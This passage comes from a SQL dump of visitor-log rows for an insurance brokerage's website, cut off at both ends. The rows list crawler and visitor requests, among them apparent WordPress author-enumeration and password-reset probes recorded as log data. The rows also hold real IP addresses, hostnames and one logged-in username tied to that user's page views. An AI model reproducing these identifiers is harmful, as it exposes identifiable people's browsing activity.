Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','lu','','','','','','','2','0',0),(15518,'0b_c605dc2d178f484f57b14a26a918006f','1460259600','194.187.249.135','194.187.249.135','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(15521,'0b_71d298f77475d1fab263f0b1038c3bda','1460260889','108.33.207.86','108.33.207.86','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win10','Chrome 49','us','1366 x 768','Google','','','','','0','0',0),(15524,'0b_71d298f77475d1fab263f0b1038c3bda','1460260902','108.33.207.86','108.33.207.86','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1366 x 768','','','','','','0','0',0),(15525,'0b_859ee5fbec0f330555d47f10529c1ab7','1460268969','62.210.148.246','mj9.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(15527,'0b_d71cd9d21f86eb6b4be24b24c568acf1','1460269153','207.46.13.85','msnbot-207-46-13-85.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15530,'0b_d71cd9d21f86eb6b4be24b24c568acf1','1460269218','207.46.13.85','msnbot-207-46-13-85.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15531,'0b_089d0006d89598e41a586896101fbbcc','1460271027','40.77.167.43','msnbot-40-77-167-43.search.msn.com','/contact/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(15533,'0b_157d3faff094afd95b261508e65f6da1','1460273147','207.46.13.164','msnbot-207-46-13-164.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15534,'0b_981dc1ee5023998c22de12e458fd336c','1460273194','40.77.167.43','msnbot-40-77-167-43.search.msn.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15537,'0b_fbe9835db82a4748f9be95059100c085','1460277639','66.249.64.89','crawl-66-249-64-89.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(15540,'0b_fbe9835db82a4748f9be95059100c085','1460277644','66.249.64.84','crawl-66-249-64-84.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(15543,'0b_cdf648f16d0cec86ed4fdb1308a4572a','1460279221','69.30.198.242','69.30.198.242','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','3','0',0),(15545,'0b_cdf648f16d0cec86ed4fdb1308a4572a','1460279233','69.30.198.242','69.30.198.242','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','3','0',0),(15546,'0b_cdf648f16d0cec86ed4fdb1308a4572a','1460279244','69.30.198.242','69.30.198.242','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','3','0',0),(15549,'0b_cdf648f16d0cec86ed4fdb1308a4572a','1460279257','69.30.198.242','69.30.198.242','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','3','0',0),(15552,'0b_f05b9ad77a1a6b6ea9032cb907fc8209','1460282193','66.249.64.29','crawl-66-249-64-29.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(15554,'0b_be45a4aa7ccf6c9d15ed25f234f81d49','1460282580','207.46.13.189','msnbot-207-46-13-189.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15557,'0b_778be4ed18f31a78d2b31c2c744277c3','1460282705','104.223.17.244','104.223.17.244.static.quadranet.com','/contact/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0','','',0,'MacOSX','Firefox 29','us','','','','','','','0','0',0),(15558,'0b_50e469d39c1cb78b7df0cac811e12955','1460282954','66.249.64.84','crawl-66-249-64-84.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(15560,'0b_7c2f799e1416dcfcc290422da41f8de2','1460291150','207.46.13.164','msnbot-207-46-13-164.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15561,'0b_fbd4653fd85126ad9f8c86230f75786f','1460291640','66.249.66.18','crawl-66-249-66-18.googlebot.com','/licensing-contracting/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(15563,'0b_fbd4653fd85126ad9f8c86230f75786f','1460292835','66.249.66.18','crawl-66-249-66-18.googlebot.com','/contact/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(15564,'0b_a0e265f6a8736bfd8906947cd27bdc53','1460293527','91.200.12.26','huangdisisi0708.com','/?author=1','Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)','http://www.empireins.com/?author=1','',0,'Win7','IE 9','cn','','','','','','','0','0',0),(15566,'0b_6818ef5853ac0fd2d42cfbfd9744dcbb','1460293535','91.200.12.26','huangdisisi0708.com','/?author=1','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(15569,'0b_6818ef5853ac0fd2d42cfbfd9744dcbb','1460293536','91.200.12.26','huangdisisi0708.com','/author/admin/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(15570,'0b_6818ef5853ac0fd2d42cfbfd9744dcbb','1460293540','91.200.12.26','huangdisisi0708.com','/?author=2','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(15572,'0b_6818ef5853ac0fd2d42cfbfd9744dcbb','1460293541','91.200.12.26','huangdisisi0708.com','/?author=3','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(15575,'0b_6818ef5853ac0fd2d42cfbfd9744dcbb','1460293543','91.200.12.26','huangdisisi0708.com','/?author=4','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(15578,'0b_6818ef5853ac0fd2d42cfbfd9744dcbb','1460293549','91.200.12.26','huangdisisi0708.com','/?author=5','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(15579,'0b_1a7dc5e2e0ee1fb31b3ffb30eacd3480','1460293813','180.76.15.7','baiduspider-180-76-15-7.crawl.baidu.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(15581,'0b_d4a53da66c5cf7a498a9b24e640ed0c1','1460294155','180.76.15.160','baiduspider-180-76-15-160.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(15582,'0b_8421c57e3a7d9fe84df5851b91dc87a1','1460299193','207.46.13.164','msnbot-207-46-13-164.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15584,'0b_a4ee18e912c234697a41993bf78a4a12','1460300669','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(15587,'0b_a4ee18e912c234697a41993bf78a4a12','1460300673','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(15588,'0b_a4ee18e912c234697a41993bf78a4a12','1460300676','184.154.139.23','placeholder.sitelock.com','/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(15590,'0b_a4ee18e912c234697a41993bf78a4a12','1460300678','184.154.139.23','placeholder.sitelock.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(15591,'0b_a4ee18e912c234697a41993bf78a4a12','1460300682','184.154.139.23','placeholder.sitelock.com','/comments/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(15594,'0b_a4ee18e912c234697a41993bf78a4a12','1460300683','184.154.139.23','placeholder.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(15596,'0b_a4ee18e912c234697a41993bf78a4a12','1460300685','184.154.139.23','placeholder.sitelock.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(15597,'0b_79726e0721b836f95ab4395e7f8746e7','1460300688','184.154.139.23','placeholder.sitelock.com','/?p=283','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','0','0',0),(15600,'0b_a4ee18e912c234697a41993bf78a4a12','1460300689','184.154.139.23','placeholder.sitelock.com','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(15603,'0b_ea3b8e2f116635a466cf9dc4677882aa','1460302980','51.254.141.5','5.ip-51-254-141.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(15605,'0b_ea3b8e2f116635a466cf9dc4677882aa','1460302982','51.254.141.5','5.ip-51-254-141.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(15606,'0b_0401d2fe625604e57328af3394494522','1460303162','176.9.124.8','static.8.124.9.176.clients.your-server.de','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.71 Safari/537.36','','',0,'Linux','Chrome 28','de','','','','','','','0','0',0),(15609,'0b_55a76a4dd53f48357d1328157e6b0553','1460303165','176.9.124.8','static.8.124.9.176.clients.your-server.de','/','curl/7.35.0','','',0,'','','de','','','cURL','','','','0','0',0),(15612,'0b_462ee48d197278b2f202a562e40681d4','1460305046','94.242.222.23','ip-static-94-242-222-23.server.lu','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','lu','','','','','','','2','0',0),(15615,'0b_731e26cf48a6cab352b0ec63a5949ebf','1460314389','66.249.66.18','crawl-66-249-66-18.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(15618,'0b_8fe763377d4ec9192a2843daa77398e7','1460316752','66.249.83.147,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(15620,'0b_19a7433495578e2109ec3cc7e454c4f6','1460316754','66.249.83.133,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(15623,'0b_7706ac02bf0404d8911f0f0de7c68905','1460317594','173.255.243.26','li253-26.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(15624,'0b_c43dceb0d717b77666050a57394d7a2d','1460318218','180.76.15.159','baiduspider-180-76-15-159.crawl.baidu.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(15626,'0b_dbdb426e00cb6a1f0817db8c824d9304','1460323756','188.240.88.104','static104.mediasecure.org','/?author=1','Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0','','',0,'Win7','Firefox 5','','','','','','','','0','0',0),(15627,'0b_dbdb426e00cb6a1f0817db8c824d9304','1460323759','188.240.88.104','static104.mediasecure.org','/author/admin/','Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0','','',0,'Win7','Firefox 5','','','','','','','','0','0',0),(15629,'0b_ff3acaa2a93186affca24b1fba287654','1460324650','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(15632,'0b_ff3acaa2a93186affca24b1fba287654','1460324661','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(15633,'0b_ff3acaa2a93186affca24b1fba287654','1460324681','50.108.156.48','50.108.156.48','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(15636,'0b_ff3acaa2a93186affca24b1fba287654','1460324706','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(15638,'0b_ff3acaa2a93186affca24b1fba287654','1460324715','50.108.156.48','50.108.156.48','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(15639,'0b_3ba9f134ea4e9a5f1fbc5bdc6848da72','1460331010','203.0.215.11','203.0.215.11','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.bing.com/search?q=empire+insurance+brokers&src=IE-TopResult&FORM=IE10TR','empire insurance brokers',1,'Win7 x64','IE 10','au','','Bing','','','','','0','0',0),(15642,'0b_3ba9f134ea4e9a5f1fbc5bdc6848da72','1460331022','203.0.215.11','203.0.215.11','/home/feed/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','au','','','','','','','0','0',0),(15644,'0b_3ba9f134ea4e9a5f1fbc5bdc6848da72','1460331022','203.0.215.11','203.0.215.11','/feed/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','au','','','','','','','0','0',0),(15647,'0b_3ba9f134ea4e9a5f1fbc5bdc6848da72','1460331032','203.0.215.11','203.0.215.11','/comments/feed/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','au','','','','','','','0','0',0),(15650,'0b_3ba9f134ea4e9a5f1fbc5bdc6848da72','1460331032','203.0.215.11','203.0.215.11','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','au','','','','','','','0','0',0),(15653,'0b_3ba9f134ea4e9a5f1fbc5bdc6848da72','1460331041','203.0.215.11','203.0.215.11','/about-us/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','au','','','','','','','0','0',0),(15656,'0b_3ba9f134ea4e9a5f1fbc5bdc6848da72','1460331042','203.0.215.11','203.0.215.11','/contact/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','au','','','','','','','0','0',0),(15659,'0b_3ba9f134ea4e9a5f1fbc5bdc6848da72','1460331051','203.0.215.11','203.0.215.11','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','au','','','','','','','0','0',0),(15662,'0b_3ba9f134ea4e9a5f1fbc5bdc6848da72','1460331051','203.0.215.11','203.0.215.11','/about-us/feed/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/about-us/','',0,'Win7 x64','IE 10','au','','','','','','','0','0',0),(15665,'0b_3ba9f134ea4e9a5f1fbc5bdc6848da72','1460331061','203.0.215.11','203.0.215.11','/about-us/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/about-us/','',0,'Win7 x64','IE 10','au','','','','','','','0','0',0),(15668,'0b_3ba9f134ea4e9a5f1fbc5bdc6848da72','1460331061','203.0.215.11','203.0.215.11','/?p=9','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/about-us/','',0,'Win7 x64','IE 10','au','','','','','','','0','0',0),(15669,'0b_3ba9f134ea4e9a5f1fbc5bdc6848da72','1460331070','203.0.215.11','203.0.215.11','/contact/feed/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/contact/','',0,'Win7 x64','IE 10','au','','','','','','','0','0',0),(15671,'0b_3ba9f134ea4e9a5f1fbc5bdc6848da72','1460331070','203.0.215.11','203.0.215.11','/contact/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','au','','','','','','','0','0',0),(15672,'0b_3ba9f134ea4e9a5f1fbc5bdc6848da72','1460331080','203.0.215.11','203.0.215.11','/?p=8','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/contact/','',0,'Win7 x64','IE 10','au','','','','','','','0','0',0),(15675,'0b_3ba9f134ea4e9a5f1fbc5bdc6848da72','1460331080','203.0.215.11','203.0.215.11','/contact/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','au','','','','','','','0','0',0),(15677,'0b_3ba9f134ea4e9a5f1fbc5bdc6848da72','1460331090','203.0.215.11','203.0.215.11','/contact/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','au','','','','','','','0','0',0),(15680,'0b_9c2108d53be8e5d83271e1cb44029c32','1460331101','203.0.215.11','203.0.215.11','/contact/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(15683,'0b_9c2108d53be8e5d83271e1cb44029c32','1460331101','203.0.215.11','203.0.215.11','/?p=8','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(15686,'0b_a08354b0fe9944ae8dd58e2a569c193c','1460331501','66.249.66.8','crawl-66-249-66-8.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(15689,'0b_38fa1332705376f041b830c185cfcc2c','1460332314','222.77.214.15','15.214.77.222.broad.pt.fj.dynamic.163data.com.cn','/','Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0','http://www.empireins.com/','',0,'WinXP','Firefox 3','cn','','','','','','','0','0',0),(15690,'0b_56121d05c3fc887b390ec62136d36491','1460335846','68.194.62.189','ool-44c23ebd.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win10','Chrome 49','us','1366 x 768','Google','','','','','0','0',0),(15693,'0b_56121d05c3fc887b390ec62136d36491','1460335851','68.194.62.189','ool-44c23ebd.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1366 x 768','','','','','','0','0',0),(15695,'0b_8e99410e0710482aca537615fbe5565c','1460337692','82.94.179.38','euspider0.wise-guys.nl','/','Python-urllib/2.7','','',0,'','','nl','','','Python-urllib','','','','0','0',0),(15696,'0b_a93042f2eca1dca11148d9ce5f7b22d3','1460337693','82.94.179.38','euspider0.wise-guys.nl','/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(15699,'0b_a93042f2eca1dca11148d9ce5f7b22d3','1460337698','82.94.179.38','euspider0.wise-guys.nl','/about-us/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(15702,'0b_a93042f2eca1dca11148d9ce5f7b22d3','1460337701','82.94.179.38','euspider0.wise-guys.nl','/about-us/meet-the-eib-team/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(15704,'0b_a93042f2eca1dca11148d9ce5f7b22d3','1460337702','82.94.179.38','euspider0.wise-guys.nl','/meet-the-eib-team/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(15705,'0b_a93042f2eca1dca11148d9ce5f7b22d3','1460337705','82.94.179.38','euspider0.wise-guys.nl','/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(15708,'0b_a93042f2eca1dca11148d9ce5f7b22d3','1460337708','82.94.179.38','euspider0.wise-guys.nl','/igo/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(15710,'0b_a93042f2eca1dca11148d9ce5f7b22d3','1460337713','82.94.179.38','euspider0.wise-guys.nl','/forms/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(15713,'0b_a93042f2eca1dca11148d9ce5f7b22d3','1460337716','82.94.179.38','euspider0.wise-guys.nl','/contact/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(15716,'0b_a93042f2eca1dca11148d9ce5f7b22d3','1460337720','82.94.179.38','euspider0.wise-guys.nl','/carriers/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(15717,'0b_a93042f2eca1dca11148d9ce5f7b22d3','1460337723','82.94.179.38','euspider0.wise-guys.nl','/register/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(15720,'0b_a93042f2eca1dca11148d9ce5f7b22d3','1460337726','82.94.179.38','euspider0.wise-guys.nl','/insentives/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(15723,'0b_a93042f2eca1dca11148d9ce5f7b22d3','1460337729','82.94.179.38','euspider0.wise-guys.nl','/agent-tools/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(15726,'0b_a93042f2eca1dca11148d9ce5f7b22d3','1460337732','82.94.179.38','euspider0.wise-guys.nl','/case-status/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(15729,'0b_674a8c377eee7ebc5bcbabdec1e8cc55','1460345513','13.92.237.79','13.92.237.79','/','User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5','','',0,'WinXP','Firefox 3','us','','','','','','','0','0',0),(15732,'0b_674a8c377eee7ebc5bcbabdec1e8cc55','1460345524','13.92.237.79','13.92.237.79','/contact','User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5','','',0,'WinXP','Firefox 3','us','','','','','','','0','0',0),(15735,'0b_674a8c377eee7ebc5bcbabdec1e8cc55','1460345534','13.92.237.79','13.92.237.79','/contact/','User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5','','',0,'WinXP','Firefox 3','us','','','','','','','0','0',0),(15737,'0b_18a9e8467410ad3194eb5f356fb80137','1460348282','157.55.39.215','msnbot-157-55-39-215.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15740,'0b_e6eb5569b26f5c3b1fb9d93eaf0148bd','1460349631','207.46.13.164','msnbot-207-46-13-164.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; 